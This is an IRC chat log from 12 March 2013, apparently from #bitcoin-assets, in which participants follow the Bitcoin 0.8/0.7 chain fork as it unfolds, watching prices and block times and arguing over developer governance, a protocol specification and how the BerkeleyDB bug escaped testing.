if you are up for it http://buttcoin.org/bitcoin-has-forked-markets-are-fucked-massive-sell-off-ship-is-sinking Mar 12 07:23:29 mhm yah thevolume isnt that high on virtex Mar 12 07:24:13 Chaang-Noi the something bawwwfull crowd... btc goes 15 to 45, they're like whelp Mar 12 07:24:25 bitcoin goes 45 to 40 for 15 minutes... omg MUST MAKE ALL THE POSTS Mar 12 07:24:36 pigeons: check your $mail Mar 12 07:24:40 tomorrow it'll be like... what, nothing happened. so what if it's 50. doesn't prove anything Mar 12 07:24:41 pigeons: check your $email Mar 12 07:24:43 imean Mar 12 07:25:00 mp yeah 15 to 45, then a short dip to 38 and they are like, told you its over, lulz Mar 12 07:26:17 uh oh, badchain got longer Mar 12 07:26:46 whos mining on badchain Mar 12 07:26:59 ;;tslb Mar 12 07:27:02 Time since last block: 9 minutes and 53 seconds Mar 12 07:27:04 whoa **** BEGIN LOGGING AT Tue Mar 12 07:33:04 2013 Mar 12 07:42:35 ;;tslb Mar 12 07:42:40 Time since last block: 25 minutes and 29 seconds Mar 12 07:43:25 so what's best case scenario here, something like 16 blocks chain orphaned ? Mar 12 07:44:14 oh looks like btcguild got another Mar 12 07:44:17 ;;tslb Mar 12 07:44:20 Time since last block: 27 minutes and 9 seconds Mar 12 07:44:26 oh wtf Mar 12 07:44:53 ;;bc,stats Mar 12 07:44:53 mod6 this is the bad chain gribble sees Mar 12 07:44:55 Current Blocks: 225454 | Current Difficulty: 4367876.000842196 | Next Difficulty At Block: 225791 | Next Difficulty In: 337 blocks | Next Difficulty In About: 1 day, 23 hours, 34 minutes, and 35 seconds | Next Difficulty Estimate: 4838985.15316 | Estimated Percent Change: 10.78577 Mar 12 07:44:57 back to 27, oh lulz btc. how you troll us Mar 12 07:45:03 ;;ticker Mar 12 07:45:04 BTCUSD ticker | Best bid: 46.46002, Best ask: 46.75436, Bid-ask spread: 0.29434, Last trade: 46.93566, 24 hour volume: 134874.62479342, 24 hour low: 36.65000, 24 hour high: 48.46900, 24 hour vwap: 44.53366 Mar 12 07:45:19 https://coinbase.com/network/blocks us this Mar 12 07:45:24 use* Mar 12 07:45:38 it has been 44 mins Mar 12 07:45:47 https://blockchain.info/blocks Mar 12 07:46:09 im not sure how to interpret the data Mar 12 07:46:15 so.. are we all good then? Mar 12 07:46:30 we want the "orphaned" one to win I believe Mar 12 07:46:43 oh god Mar 12 07:47:18 it'll be a few hours i guess Mar 12 07:47:26 https://bitcointalk.org/index.php?topic=152027.msg1614614#msg1614614 Mar 12 07:47:28 who is mining on 0.8 then? Mar 12 07:47:30 consensus emerges. Mar 12 07:47:51 bitcoin devs to stop all development of new versions, work on bitcoin specification exclusively, then release one cleanned up bitcoin version. Mar 12 07:48:17 an' take it from there. Mar 12 07:49:34 $mpexlag Mar 12 07:49:35 mircea_popescu: 0.110903978348 seconds Mar 12 07:49:45 BFL should atone for their sins and mine with the ASICs if they have them and help save the network Mar 12 07:50:28 overall this still lowers difficulty next round a little right? Mar 12 07:50:37 Bowjob the network is being saved right now…. it's just taking some time because hashing power is split between two chains. Mar 12 07:50:41 they had to remine blocks right? Mar 12 07:50:53 and a portion of the hashing is still going to dead blocks Mar 12 07:50:56 ThickAsThieves yes it does Mar 12 07:50:56 yeah but who is mining on 0.8 still? Mar 12 07:50:59 diff shall have a hole in it Mar 12 07:51:04 they have no clue? Mar 12 07:51:27 people sleep Mar 12 07:51:29 Bowjob prolly p2pool Mar 12 07:51:40 i wanna sleep Mar 12 07:51:56 sleep? Mar 12 07:51:57 whats that Mar 12 07:51:58 but i also wanna watch the fireworks Mar 12 07:53:03 so this is good for asicminer(s), they get an extra day of lower diff, maybe more Mar 12 07:53:18 whens the nev div due? Mar 12 07:53:22 40 hours? Mar 12 07:53:23 wed/thu Mar 12 07:53:36 sweeet Mar 12 07:53:41 ;;bc,stats Mar 12 07:53:44 Current Blocks: 225454 | Current Difficulty: 4367876.000842196 | Next Difficulty At Block: 225791 | Next Difficulty In: 337 blocks | Next Difficulty In About: 1 day, 23 hours, 34 minutes, and 35 seconds | Next Difficulty Estimate: 4838985.15316 | Estimated Percent Change: 10.78577 Mar 12 07:53:48 ThickAsThieves they are the largest losers mining on dead chain Mar 12 07:54:00 Interesting how p2pool was supposed to "prevent network centralization" seems to be doing the job... Mar 12 07:54:08 asicminer is on the main chain, btcguild Mar 12 07:54:21 so basically if i get this right, those mining on 0.8 are wasting their time Mar 12 07:54:30 yes Mar 12 07:54:37 their blocks will never get confirmed Mar 12 07:54:55 by "main" you mean 0.7 Mar 12 07:54:57 unless they fork intentionally... Mar 12 07:55:23 yes Mar 12 07:55:33 any press conference release statements from the devs yet? Mar 12 07:55:33 the one with majority hashing power Mar 12 07:55:44 BingoBongo exactly. Mar 12 07:55:47 essentially btcguild and the other big ones are doing a 51% attack Mar 12 07:55:59 to go back to the .7 chain Mar 12 07:56:00 ThickAsThieves and it's not trivial to get the fuck off .8 Mar 12 07:56:04 because you'll need old chain Mar 12 07:56:12 eleuretheria or whatever wants his coins back Mar 12 07:56:21 kakobrekla that poor guy you know ? Mar 12 07:56:26 fucked by .8 x2 Mar 12 07:56:38 yea Mar 12 07:56:41 skip the 0.8 Mar 12 07:56:47 next release should be 0.9 Mar 12 07:56:49 NEXT TIME devs want ppl to upgrade ppl will be like Mar 12 07:56:54 "sure, got escrow ?" Mar 12 07:56:57 too bad for him, but maybe now he'll have better protocol for changing his software Mar 12 07:57:11 yea. as in, not change it. Mar 12 07:57:14 perfect protocol. Mar 12 07:57:46 sdice can support the forked chain for bet processing Mar 12 07:57:58 im lucky bitbet runs 0.72 Mar 12 07:58:23 i assume my bet was rejected Mar 12 07:58:29 gah btc is very complicated lol Mar 12 07:58:57 bet idea* Mar 12 08:00:04 no idea Mar 12 08:00:08 a Mar 12 08:00:12 !ticker m ^oix Mar 12 08:00:13 not processed yet Mar 12 08:00:13 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 39.70080218 / 44.63179932 / 53.27201335 (66598 shares, 22,713.19 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 12 08:00:25 but dunno if it fits the rules Mar 12 08:00:46 ThickAsThieves give bets a day or so Mar 12 08:00:49 i have 0.7.1 ... Mar 12 08:01:05 mircea_popescu he wants to do these meta bets Mar 12 08:01:19 np, just interested to see if it fits within rules Mar 12 08:01:28 well whatever he wants, if you don't see it in a day it's prolly been rejected Mar 12 08:02:17 Once the ophaned chain take over again BTCguild will get > 10 blocks I wounder how they will credit it Mar 12 08:03:05 proportionally, like always? Mar 12 08:03:40 ironic that the end result of the Luke-Jr & co group of idiots starting their little jihad on s.dice Mar 12 08:04:10 will be the extinction of their c++ only "refernece" implementation and in general the end of their centralist chokehold on bitcoin Mar 12 08:04:21 i guess the lesson here is that programmers have no business arguing with financiers. Mar 12 08:04:27 won't be learned tho, i bet. Mar 12 08:06:03 almost done Mar 12 08:06:09 ;;tslb Mar 12 08:06:12 Time since last block: 49 minutes and 1 second Mar 12 08:11:27 last 3 blocks were prphaned, ??? not good? Mar 12 08:11:43 [MPEX] [S.BBET] 100 @ 0.00181 = 0.181 BTC [+] Mar 12 08:11:57 https://coinbase.com/network/blocks last 3 blocks? wtf? Mar 12 08:12:43 they're part of the 0.7 chain Mar 12 08:12:49 it's catching up Mar 12 08:13:38 just two more blocks and it'll be the main chain Mar 12 08:14:43 tied now Mar 12 08:14:54 yay. go 51% attack Mar 12 08:16:50 well i see one problem Mar 12 08:16:56 my balance on btc-e Mar 12 08:16:59 -18 Mar 12 08:17:11 should be about 0 Mar 12 08:17:35 ah.. btc-e. I lose my mind on that trollbox Mar 12 08:17:39 same on other exchanges Mar 12 08:17:41 its bad for my health Mar 12 08:17:44 negative balance Mar 12 08:17:57 whoa Mar 12 08:18:06 a bunch of incoming deposits Mar 12 08:22:30 so it's all over Mar 12 08:24:04 at least we had some good drama ya know Mar 12 08:24:41 so thats it? crisis averted? Mar 12 08:25:00 yep Mar 12 08:25:12 Crisis averted, drama unleased. Mar 12 08:25:14 now come the personal attacks, panic selling, etc Mar 12 08:25:29 but bitcoin marches on Mar 12 08:25:45 I thought the ending was a bit anti climatic Mar 12 08:26:10 Aight, preparing fiat Mar 12 08:26:22 ;;ticker Mar 12 08:26:22 BTCUSD ticker | Best bid: 45.05186, Best ask: 45.05187, Bid-ask spread: 0.00001, Last trade: 45.05187, 24 hour volume: 136276.60628425, 24 hour low: 36.65000, 24 hour high: 48.46900, 24 hour vwap: 44.54592 Mar 12 08:26:32 big forks have happened before, not really a big deal Mar 12 08:26:52 It's not the ending. It is the opening chapter in the Latest DLC. BitCoin: Mission Standardization Mar 12 08:26:59 I printed an order page for topace, but then hes like nope. dont transact Mar 12 08:27:10 so my free option didnt work out Mar 12 08:27:11 lol Mar 12 08:27:34 the tech blogs will have a field day with this. orgasming over the opportunity to spread some FUD Mar 12 08:27:54 I think we can expect the exchange rate to be depressed for a while. Mar 12 08:27:57 well, as I stated before.. weex wallet is the perfect example of correctnes Mar 12 08:28:10 here it goes Mar 12 08:28:12 wonder what other sites are like :P Mar 12 08:29:05 ;;tslb Mar 12 08:29:08 Time since last block: 1 minute and 50 seconds Mar 12 08:30:17 so will there be a mass selloff afte rpeople get their btc to gox? Mar 12 08:30:21 yes Mar 12 08:30:39 yeah, lots of nervous nellies out there Mar 12 08:30:39 ;;ticker Mar 12 08:30:40 BTCUSD ticker | Best bid: 43.99646, Best ask: 44.00000, Bid-ask spread: 0.00354, Last trade: 44.00000, 24 hour volume: 137786.72229724, 24 hour low: 36.65000, 24 hour high: 48.46900, 24 hour vwap: 44.54643 Mar 12 08:30:47 people who don't understand the system… pure speculators Mar 12 08:31:17 I'm watching from coinlab Mar 12 08:31:38 me too Mar 12 08:31:40 you're at coinlab? or coinlab has an actual product out? Mar 12 08:31:54 a fancy ticker Mar 12 08:31:59 and a working goxwall Mar 12 08:32:19 and of course the Buy $1m button Mar 12 08:32:20 cant be fancier than clarkmoody? Mar 12 08:32:25 http://webchat.freenode.net/?channels=bitcoin-assets Mar 12 08:32:29 mhm Mar 12 08:32:29 45 Mar 12 08:32:33 Bulls fighting back? Mar 12 08:32:38 lol Mar 12 08:32:41 it wont last Mar 12 08:32:46 I'd let the bears have a go at it for now Mar 12 08:32:46 people just waiting for confirms Mar 12 08:32:51 oh Mar 12 08:32:52 lol Mar 12 08:36:58 I imagine there's a large low information"Investor" population that through inertia or ignorance recognizes what a small hiccup this should have been... When they start looking for people to inform them though.... Mar 12 08:39:02 so did we fix yet? Mar 12 08:39:07 yeah Mar 12 08:39:10 just waiting for you to reboot Mar 12 08:39:27 wheres that gif of this anime chick drinking coffee Mar 12 08:39:29 awesome thanks Mar 12 08:39:31 I'm making a trip to the Pawn Shop tomorrow and loading up on fiat for the opportunity that should arise these next few weeks. The DFI I use is indicating a "correction" to $15-$35 within 2 or 3 weeks, confidence interval of 66.7% Mar 12 08:40:00 partly cloudy, chance of rain Mar 12 08:40:25 EH, its just the Drama FUD Index Mar 12 08:40:47 omg! bitcoin didnt die! buy! Mar 12 08:42:06 :) Mar 12 08:42:38 ;;ticker Mar 12 08:42:39 BTCUSD ticker | Best bid: 44.16000, Best ask: 44.43000, Bid-ask spread: 0.27000, Last trade: 44.54000, 24 hour volume: 137292.69111752, 24 hour low: 36.65000, 24 hour high: 48.46900, 24 hour vwap: 44.50843 Mar 12 08:43:08 i'm not sure if gox is fully open yet Mar 12 08:43:36 so 24 blocks in the end. Mar 12 08:43:47 ;;calc 24 * 25 * 48.47 Mar 12 08:43:47 29082 Mar 12 08:43:52 heh. Mar 12 08:44:14 we just blew somalia's current week budget. Mar 12 08:44:37 That's about a used VW Phaeton Mar 12 08:49:46 mp lol Mar 12 08:52:04 Appear to be roughly the ask for this real estate http://www.trulia.com/property/3107337882-2640-Arsenal-St-Saint-Louis-MO-63118 Mar 12 08:53:19 https://bitcointalk.org/index.php?topic=152027.msg1614847#msg1614847 << Mar 12 08:53:25 anybody here actually interested in this btw ? Mar 12 08:53:45 lulz mircea Mar 12 08:57:51 Lulz Jeff G, How many support threads on that forum have ended in essentially: export your private keys and import into X software other than what you have been using Mar 12 09:03:41 If felt that we would have a tremendous rally today this bug didnt happen Mar 12 09:03:51 oh well. i'll take what i can Mar 12 09:03:59 A software neutral specification has been needed for too long Mar 12 09:06:30 i am starting to see that. Mar 12 09:07:58 I give it probably 3 years for a full move from code control to stardardized and documented. Mar 12 09:10:09 There's the long fight over what the spec is, and then theres the awkward grace period until the spec forces people to leave the old code controlled version (unless crisis compells it earlier) Mar 12 09:11:02 Probably not going to happen. People like mystical chains-of-heredity. Mar 12 09:11:47 It's in their nature--right beside the part that thinks god talks directly to them. Mar 12 09:13:30 Some things are more powerful than heredity Mar 12 09:13:37 http://i0.kym-cdn.com/photos/images/newsfeed/000/343/462/79a.gif Mar 12 09:15:50 The magic Satoshi? You think the huge number of sociopaths running bitcoin are interested in an outside non-mystic taking the reins? Mar 12 09:16:53 that bottle looks almost like a gun Mar 12 09:16:58 pointed at him Mar 12 09:17:41 Happier bottle http://i.imgur.com/jUQ6z.jpg?1 Mar 12 09:27:58 BingoBongo so five years ain't that bad. Mar 12 09:28:23 midnightmagic i wouldbn't bet on "people" mattering Mar 12 09:28:26 we are discussing money. Mar 12 09:28:41 people who use bitcoin are the people I'm talking about. Mar 12 09:28:53 they are who create the economy which bitcoin encompasses. Mar 12 09:28:58 people who use bitcoin have not a fucking clue. Mar 12 09:29:01 allow me to quote : Mar 12 09:29:25 I think this means that bitcoin is in jeopardy. Mar 12 09:29:25 and they hate mpex shares! Mar 12 09:29:25 WHY ARENT the bitcoin police doing anything about these DDOS attacks? Mar 12 09:29:37 correct, they don't. the thing is a lot of them know that, so what do they do? social proof. and they pick a guy (like satoshi) and decide he is the nearest thing to god. Mar 12 09:30:09 problem is the god is gone Mar 12 09:30:15 and it left behind a coven of idiots. Mar 12 09:30:24 And he left a minor southern deity in charge. Mar 12 09:30:24 the way things play out is popemassacre Mar 12 09:30:54 You know for someone who complains about it so much I'm surprised you're taking such an interest in leading a takeover.. :-) Mar 12 09:31:07 (and by surprised, I mean, "not very surprised") Mar 12 09:31:23 btw, bitfunder is 100% online. withdraws/ deposits Mar 12 09:31:29 you guys do okay? :) Mar 12 09:31:34 course. Mar 12 09:31:39 god talks to me. :) Mar 12 09:31:44 mircea_popescu Not at all. Maybe tie the definitive switch to standards only to the next halving? God is gone so let's send things to committee. Mar 12 09:32:18 midnightmagic im not leading anything, but i'm not standing for nonsensical crap either. Mar 12 09:33:36 You're trying to suggest you could be the lead of a Real bitcoin replacement. :) Mar 12 09:33:58 Or rather.. boob lady is. :) Mar 12 09:34:00 not really. but i am saying that the current stuff has to go. Mar 12 09:34:43 actually, i said it months ago. Mar 12 09:34:51 Yes I read that. Mar 12 09:35:07 i said the moment devs try to act like priests and leverage the obscurity of their bad code into political theosophy... they're screwed. Mar 12 09:35:16 i guess they don't read english any better than they read their own code. Mar 12 09:35:50 Actually, the reference implementation was never meant to be the end-all canonical version. Satoshi always hoped someone would write a properly-funded, properly engineered client and it would become the canonical client. Mar 12 09:35:55 (sort of Mar 12 09:36:03 i am aware. Mar 12 09:36:21 I see no examples of political theosophy. You clearly have something in mind: out with it. :) Mar 12 09:36:42 if you recall, this all started with people knowing which transactions are good. Mar 12 09:36:51 and which usecases are acceptable. Mar 12 09:36:54 and on and on. Mar 12 09:38:33 I don't see how a rationale (which Satoshi himself started, btw, by requesting that Wikileaks not use bitcoin yet,) is the snowball accretion of full-blown theosophy. Mar 12 09:38:53 And mircea_popescu many will probably try to sweep it under the rug as LevelDB is broken, because it isn't BerkelyDB. You're on the right track, but I think this was probably the wrong error... Mar 12 09:39:24 BingoBongo does it make much of a difference ? Mar 12 09:39:48 midnightmagic wrong step on satoshi's part. let it be broken, rebuild. why protect it ? Mar 12 09:39:52 Currently, the best choice is sipa's blacklist patch, as it allows us to remain on the faster 0.8 while still mining. Mar 12 09:39:59 if it's good it will prevail. if it sucks it will just crack and something else will come out of it Mar 12 09:40:10 mircea_popescu the difference is probably how much they will try to reiforce their canon against sense... Mar 12 09:40:22 mircea_popescu: blockchain-destroying events tend to set back adoption progress amongst people who are afraid of what everyone else will think. Mar 12 09:40:34 midnightmagic so ? Mar 12 09:40:39 mircea_popescu: the bootstrapping itself is still going on. Mar 12 09:40:54 "Good" bitcoin will probably have to overtake old by 51% As worse overtook bad tonight Mar 12 09:40:57 look, like it or not, for this reason or for some other reason, bitcoin is at a point where you can't reasonably pour more moneuy into it Mar 12 09:41:01 before it's been specified. Mar 12 09:41:07 if it can't be specified that's a dealbreaker Mar 12 09:41:14 not such a huge notion this, is it ? Mar 12 09:41:24 BingoBongo: it will overtake depending on its technical and UX merits. Mar 12 09:41:31 BingoBongo have you read the girl's explanation of why multiforks resolve and aren't a problem economically ? Mar 12 09:42:08 mircea_popescu I might have, I'll recheck her post history. Mar 12 09:42:19 BingoBongo: Think about it this way. uTorrent killed everything else on Windows. Mar 12 09:42:26 in short : suppose chain forks into 3 different chains today, a b and c Mar 12 09:42:38 mircea_popescu: On the same network? Mar 12 09:42:45 if you had 10 bitcoins today prefork, you will have 10 a 10b and 10 c bitcoins after the fork. Mar 12 09:42:57 if you sell b and buy a the price of all will go up and the price of b down. Mar 12 09:43:09 eventually the fork resolves economically simply because mining costs money. Mar 12 09:43:25 end of story. money itself is a centralising factor, and as such the slightest flicker amplifies Mar 12 09:43:54 bleah.. the crosschatter would be ridiculous.. Mar 12 09:43:58 so ? Mar 12 09:44:02 more drama, more market cap. Mar 12 09:44:27 Ah, this is kind of what I was thinking. I must have read without expressing the sentiment. I believe I've read similar on Trilema as well. Mar 12 09:44:36 i think so. Mar 12 09:44:57 to be perfectly candid, many people involved in bitcoin are good honest and well meaning individuals, who know about things. usually those things are coding. Mar 12 09:45:02 there's a lot more to know than coding in thsi world. Mar 12 09:45:09 crosschatter and high-bandwidth reorg battles would hurt individual consensus. presume the forks are all equal hashrate to begin with: due to the nature of POW, it would be far, far worse in terms of strength against attack. Mar 12 09:45:22 (like way less than 1/3) Mar 12 09:45:25 midnightmagic no. because attacker wouldn't know which to attack. Mar 12 09:45:34 midnightmagic Win32 killed everything on Windows... Crosschatter happened before, some altcoin late last year did it (no halving fork) and had to be euthanized. Mar 12 09:45:36 that's not the case. Mar 12 09:45:36 or even... why. Mar 12 09:45:59 you must presume technical acumen on the part of the attacker. Mar 12 09:46:05 technical yes. Mar 12 09:46:12 but selecting the coin to attack is not a technical problem. Mar 12 09:46:20 and you must never presume political acumen on the part of anyone. Mar 12 09:46:24 also economical savvy (as all attackers I have seen have been extremely insightful economically) Mar 12 09:46:31 you must when modelling attack. Mar 12 09:46:39 here's a bomb for you midnightmagic : Mar 12 09:46:58 if the devs were a little looser in the ass, would the sort of econ savvy attackers stay that side or join this side ? Mar 12 09:47:00 not godlike power, but intellectually perfect decisions, plus funded by $x dollars. Mar 12 09:47:12 I don't know what that means. Mar 12 09:47:28 looser in the ass ? it means being used with being fucked in that orrifice. Mar 12 09:48:18 Yeah but what has that to do with anything? Is this your way of saying you're done arguing? Mar 12 09:48:34 "Argument stopper man!" Mar 12 09:48:47 nah. Mar 12 09:48:47 You could just say so, I'd stop. Mar 12 09:48:56 i guess it doesn't convey, let me try another way. Mar 12 09:49:03 Okay. Mar 12 09:49:35 suppose buttcoin has some devs that think all usecases are equally valid, and dorkcoin has some devs who believe using the coin for gambling is spam. Mar 12 09:49:44 suppose there is one attacker such as you've modeled him. Mar 12 09:49:48 selling ASICMINER @ 0.76 Mar 12 09:49:50 which chain is getting attacked ? Mar 12 09:49:53 pm if interested Mar 12 09:50:24 by the way people dont think using bitcoin for gambling is spam, they think using bitcoin transactions to signal a lost bet is spam Mar 12 09:50:28 I'd preferentially attack the ones who appeared to be more philosophically aligned with the notion of attack. Mar 12 09:50:47 same thing pigeons. as long as you're making that call your ass is too tight. Mar 12 09:50:52 Also, if the money is on the side of the all-use-cases-are-valid (i.e. gambling and drugs, hypothetically) then obviously the money is where the attacker goes. Mar 12 09:50:55 live a little. Mar 12 09:51:13 ok maybe we should just encode files and upload them to the blockchain ala namecoin too Mar 12 09:51:19 midnightmagic not so. you will be surprised to find attackers routinely forego hitting higher payoff cooler targets Mar 12 09:51:23 to focus on the uncool ones. Mar 12 09:51:44 pigeons if we shouldn't, there should not be call for doing it. Mar 12 09:51:45 mircea_popescu: Well, not in my personal experience. But perhaps that's out-of-date these days. Mar 12 09:52:18 The gambling servers at least are very popular targets. Extorting them is almost a Russian pastime. Mar 12 09:52:40 that;s brancing the discussion off the germane path tho Mar 12 09:52:42 alpaca socks can only pay so much ransom Mar 12 09:52:48 ^^ this Mar 12 09:53:11 Even btcexpress preferred to leave his attacks on the altcoins. Mar 12 09:53:26 sure, irrelevant ventures aren't part of the discussion, if bitcoin stays alpacca we're wasting our time with these concerns/ Mar 12 09:54:04 .. but you defined the two choices earlier. I'm not agreeing that the choices match reality. I'm just hanging out in your hypothetical land because you invited me. Mar 12 09:54:32 midnightmagic that's fine, but you pervert the choices when you add riders such as "one is really vanishingly small" Mar 12 09:54:49 or "neither are payment systems, but gaming servers" Mar 12 09:54:50 etc. Mar 12 09:55:02 Well if that's not what you meant, perhaps you should define things more narrowly. :) Mar 12 09:55:21 just leave it stand as it is. the theoretical response to a 51% attack is that the attacker would make more by mining. Mar 12 09:55:40 the same applies ideologically too. the network won't get attacked for as long as it manages to not stupidly offend. Mar 12 09:55:56 keeping money ideologically neutral, implementing the old pecunia non olet Mar 12 09:56:05 is the main strategic purpose of having a devteam in the first place. Mar 12 09:56:06 I think gpumax is the counterexample to that assertion (that they'd make more by mining) Mar 12 09:56:36 i don't think so. gpumax dissapeared with pirate, as the sane people were saying back in february 2012. Mar 12 09:56:48 completely unrelated topic, gpumax Mar 12 09:57:23 nah it's not. It's an example of hashrate for sale, and successfully for sale for that matter. Mar 12 09:57:36 yes, for the purpose of covering a side attack Mar 12 09:57:42 ie, pirate's confidence scam. Mar 12 09:58:00 I don't know why you say that. Mar 12 09:58:11 ... Mar 12 09:58:20 what, this is still disputed ? Mar 12 09:58:28 [BTCTC] [CRYPTO-TRADE] 5 @ 0.2 = 1 BTC [+] Mar 12 09:58:58 More likely it was a side-business for coin laundry, but none of the miners could ever (far as I know) figure out where the coins were coming *from*. Mar 12 09:59:27 That is, none of them were ever tainted. Mar 12 09:59:50 be that as it may Mar 12 10:02:27 [BTCTC] [SYNERGY] 1 @ 0.076 BTC [-] Mar 12 10:04:17 [BTCTC] [GSDPT] 4 @ 0.00524 = 0.021 BTC [+] Mar 12 10:04:35 looks like trading on btct is back Mar 12 10:08:23 [BTCTC] [COGNITIVE] 3 @ 0.18 = 0.54 BTC [-] Mar 12 10:14:05 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] Mar 12 10:16:04 [BTCTC] [S.BBET-PT] 25 @ 0.00193 = 0.0483 BTC [+] Mar 12 10:17:14 Massive sell off occuring Mar 12 10:18:50 ;;ticker Mar 12 10:18:51 BTCUSD ticker | Best bid: 42.50000, Best ask: 43.00000, Bid-ask spread: 0.50000, Last trade: 43.00000, 24 hour volume: 143829.74796654, 24 hour low: 36.65000, 24 hour high: 48.46900, 24 hour vwap: 44.38319 Mar 12 10:19:14 10k, not so massive. Mar 12 10:19:44 well, i watched it from 45, drop to 42.5 .. i see each cent dropping Mar 12 10:28:05 https://bitfunder.com/editAssetProfile/CRYPTO.LTC now live Mar 12 10:28:26 Native LTC deposit/withdraw supported. "And as always. Has good day." Mar 12 10:28:54 unaffection comes to bitbet so naturally i wont be posting any signes. Mar 12 10:29:53 ;;ticker Mar 12 10:29:54 BTCUSD ticker | Best bid: 41.51000, Best ask: 41.99900, Bid-ask spread: 0.48900, Last trade: 41.99900, 24 hour volume: 146092.87031245, 24 hour low: 36.65000, 24 hour high: 48.46900, 24 hour vwap: 44.35230 Mar 12 10:29:55 ;;goxlag Mar 12 10:29:56 23.174488 seconds Mar 12 10:32:07 $mpexlag Mar 12 10:32:09 mircea_popescu: 0.147304058075 seconds Mar 12 10:32:12 no srsly Mar 12 10:42:00 [MPEX] [S.MPOE] 5 @ 0.00073163 = 0.0037 BTC [-] Mar 12 10:42:02 [MPEX] [S.MPOE] 5539 @ 0.00073162 = 4.0524 BTC [-] Mar 12 10:42:03 [MPEX] [S.MPOE] 456 @ 0.00072543 = 0.3308 BTC [-] Mar 12 10:54:41 In Australia, IPv6 adoption is almost non-existent, reports Josh Taylor. Mar 12 10:54:41 "It's about as bad as everywhere else on the planet, I guess, with the single exception of Romania," Asia Pacific Network Information Centre's chief scientist, Geoff Huston, said in an interview with ZDNet Australia. Mar 12 10:54:42 heh. Mar 12 10:57:10 selling ASICMINER @ 0.76, pm me if interested (at btct.co ASICMINER-PT asks are at 0.7699) Mar 12 10:57:20 Anduck you know about the tradebook ? Mar 12 10:57:27 no. Mar 12 10:57:29 ....yeeees **** BEGIN LOGGING AT Tue Mar 12 18:17:28 2013 Mar 12 18:21:09 I offer 0.03% daily on funds here. Mar 12 18:27:49 I'll be back later Mar 12 18:29:44 ;;ticker Mar 12 18:29:45 BTCUSD ticker | Best bid: 43.41654, Best ask: 43.41666, Bid-ask spread: 0.00012, Last trade: 43.50000, 24 hour volume: 166958.61630911, 24 hour low: 36.65000, 24 hour high: 48.46900, 24 hour vwap: 43.77197 Mar 12 18:30:15 We're Going Down! Mar 12 18:30:23 twss Mar 12 18:30:34 It is holding up well considering what a collosal fuck up this was Mar 12 18:31:09 colossal Mar 12 18:31:46 It wasn't that colossal... just a little forking Mar 12 18:32:22 The miners voted which would be used going forward Mar 12 18:32:25 yeah, and it's not likely that many lost btc due to incidental double spends Mar 12 18:32:32 it could have been colossal, if the pool ops weren't so cooperative Mar 12 18:32:33 That they encouraged people to change the block size and not knowing it was going to break BDB was a big fuck up Mar 12 18:32:34 Namworld: what is your bonds URL again? Mar 12 18:32:52 Troic_: beauty of the system, they have a financial incentive to cooperate Mar 12 18:32:57 https://btct.co/security/BTC-BOND Mar 12 18:33:20 smickles: that's what keeps me sane Mar 12 18:33:38 lol Mar 12 18:33:44 jborkl_: I do wish they had tested .8 better. tis could've been caught Mar 12 18:33:50 jborkl_ the idea is strong, the implementation horrible Mar 12 18:33:50 they can still mass object to changes and refuse... but the longest chain will be the one with most miners. Mar 12 18:33:56 in a sense this backhandedly proves how strong the idea is Mar 12 18:33:59 The issue is not in .8 at all... Mar 12 18:34:01 gavin had admitted to testing 500k blocks Mar 12 18:34:08 but not 1m blocks Mar 12 18:34:13 smickles heh. Mar 12 18:34:14 It's in .7 Mar 12 18:34:32 No amount of testing would have found the issue. .7 would have needed to be tested. Mar 12 18:34:39 Namworld would you stop ? Mar 12 18:34:52 any statement that claims "no amout of testing" is a lie by its nature Mar 12 18:34:52 red light. Mar 12 18:34:56 Namworld: depends how you look at it no? the iss presented with the interaction of .8 and .7 Mar 12 18:35:16 something gavin was testing, just not toroughly enough Mar 12 18:35:27 The issue was in .7, if they tested .8 forever, they'd never have found the issue if they didn't use .7 in the testing. Mar 12 18:35:28 obviously not the amount of testing they were willing to do in between chat session and harassinfg the userbase found it Mar 12 18:35:29 I ran .7 and .8 versions, If I had run testnet and made a 1mb block I would have most likely broken .7 Mar 12 18:35:35 still, more testing WOULD have eventually found it. Mar 12 18:35:53 Namworld: gavin said he would've caught it if he had tested a larger block on the testnet Mar 12 18:36:15 aye Mar 12 18:36:16 smickles gotta give props to gavin, he's one of the few that are actually contrite enough. Mar 12 18:36:24 he might be the only pro in the bunch, too. Mar 12 18:36:27 he only tested 500k blocks, and it happened on a 900k block Mar 12 18:36:39 967 or some shit Mar 12 18:36:54 I'm not saying it couldn't have been found, I'm just refuting that doing more testing on .8 would have given any result. Mar 12 18:37:00 unauthoritatively my it says berkley seems to choke in this case over about 10k records Mar 12 18:37:14 Namworld the "on .8" is a meaningless constraint. Mar 12 18:37:26 who and why would be testing on .8 only ?! Mar 12 18:37:45 really, only test a part of the code against itself? Mar 12 18:37:55 jborkl_ for great lulz. Mar 12 18:38:10 I know... but people everywhere say that .8 should have been tested more so the issue would have been found. Mar 12 18:38:27 well yes. that is correct, it should have been, Mar 12 18:38:39 nobody is saying "shouldhave been tested more by itself in a vacuum" Mar 12 18:38:43 I just solo mined on .72 again last night until it was all figured out- I knew I kept .72 around and running for a reason Mar 12 18:38:52 ARGH Mar 12 18:39:00 Namworld: i believe they do test for interaction with older versions Mar 12 18:39:07 jborkl_ i've always been slow to upgrade, specifically for lack of faith. Mar 12 18:39:12 Namworld: I think what they mean is that part of testing a new release is testing it's interactions with other versions for backward compatiblity Mar 12 18:39:20 they certainly outta now Mar 12 18:39:26 Don't you get it? I'm trying to refute people who think the issue is with .8 and that .8 alone should have been tested more... Mar 12 18:39:38 Yeah, me too- I don't like being the first to change- bit me too many times Mar 12 18:39:53 Not that more proper testing would not have found the issue (proper with many versions). That more testing of .8 alone would have not changed anything. Mar 12 18:40:18 This is the only thing I'm trying to say. Mar 12 18:40:27 personall, i include previous version interaction in the testing of one version Mar 12 18:40:47 so it's a silly argument :P differences in definitions Mar 12 18:40:56 ah, I see. Mar 12 18:41:23 Namworld a, the issue isn't with .8 Mar 12 18:41:33 the issue is with berkley db, which was on the way out Mar 12 18:42:09 THAT'S EXACTLY WHAT I'M FUCKING CLAIMING THAT THE ISSUE AIN'T ON .8! Mar 12 18:42:30 people were all up in arms about having 80 to 1000 unconfirmed transactions waiting. with NO testing, people made larger blocks - that broke BDB Mar 12 18:42:35 800 Mar 12 18:42:55 >.< Mar 12 18:43:17 yes well, you went about it in a broken way. Mar 12 18:43:43 I'm talking about people making such claims... not about me making the same claims =/ Mar 12 18:44:13 